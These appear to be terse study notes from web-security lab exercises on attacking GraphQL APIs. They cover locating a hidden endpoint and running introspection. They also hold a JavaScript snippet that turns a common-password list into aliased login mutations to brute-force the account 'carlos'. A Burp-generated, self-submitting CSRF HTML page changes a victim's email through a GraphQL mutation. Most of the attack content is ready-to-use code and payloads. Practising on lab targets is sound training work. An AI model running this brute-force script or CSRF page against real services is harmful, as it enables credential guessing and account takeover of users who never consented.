graphql api vulns

API identify

To identify if there is hidden GraphQL API endpoint send an invalid GET request endpoint and observe message Not Found, but when sending /api the response is Query not present.

Enumeration of the GraphQL API endpoint require testing with a universal query. Modify GET request with query as a URL parameter /api?query=query{__typename}.

The below response validate the identity of GraphQL endpoint:

{
  "data": {
	"__typename": "query"
  }
}

Send a new request with a URL-encoded introspection query as a query parameter.

To do this, right-click the request and select GraphQL > Set introspection query:

This introspection query works with most GraphQL servers. However, if you are working with an older GraphQL server, it may fail. If that happens, right-click anywhere within the Request panel of the message editor, then select GraphQL > Set legacy introspection query and try again.

 query IntrospectionQuery {
    __schema {
      queryType { name }
      mutationType { name }
      subscriptionType { name }
      types {
        ...FullType
      }
      directives {
        name
        description
        args {
          ...InputValue
        }
        onOperation
        onFragment
        onField
      }
    }
  }

Right-click anywhere within the Response panel of the message editor, then select GraphQL > Save GraphQL queries to site map.

Brute force login

put thos mutations inside post request inside mutations{}

copy(`123456,password,12345678,qwerty,123456789,12345,1234,111111,1234567,dragon,123123,baseball,abc123,football,monkey,letmein,shadow,master,666666,qwertyuiop,123321,mustang,1234567890,michael,654321,superman,1qaz2wsx,7777777,121212,000000,qazwsx,123qwe,killer,trustno1,jordan,jennifer,zxcvbnm,asdfgh,hunter,buster,soccer,harley,batman,andrew,tigger,sunshine,iloveyou,2000,charlie,robert,thomas,hockey,ranger,daniel,starwars,klaster,112233,george,computer,michelle,jessica,pepper,1111,zxcvbn,555555,11111111,131313,freedom,777777,pass,maggie,159753,aaaaaa,ginger,princess,joshua,cheese,amanda,summer,love,ashley,nicole,chelsea,biteme,matthew,access,yankees,987654321,dallas,austin,thunder,taylor,matrix,mobilemail,mom,monitor,monitoring,montana,moon,moscow`.split(',').map((element,index)=>`
bruteforce$index:login(input:{password: "$password", username: "carlos"}) {
        token
        success
    }
`.replaceAll('$index',index).replaceAll('$password',element)).join('\n'));console.log("The query has been copied to your clipboard.");

CSRF for change mail grapql

change content type and convert json body to

query=mutation%20changeEmail($input:ChangeEmailInput!){changeEmail(input:$input){email}}&operationName=changeEmail&variables={"input":{"email":"bg66@mail.com"}}

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0a6f00fb03a5613c815ad43e003000be.web-security-academy.net/graphql/v1" method="POST">
      <input type="hidden" name="query" value="mutation&#32;changeEmail&#40;&#36;input&#58;ChangeEmailInput&#33;&#41;&#123;changeEmail&#40;input&#58;&#36;input&#41;&#123;email&#125;&#125;" />
      <input type="hidden" name="operationName" value="changeEmail" />
      <input type="hidden" name="variables" value="&#123;&quot;input&quot;&#58;&#123;&quot;email&quot;&#58;&quot;bg1407&#64;mail&#46;com&quot;&#125;&#125;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>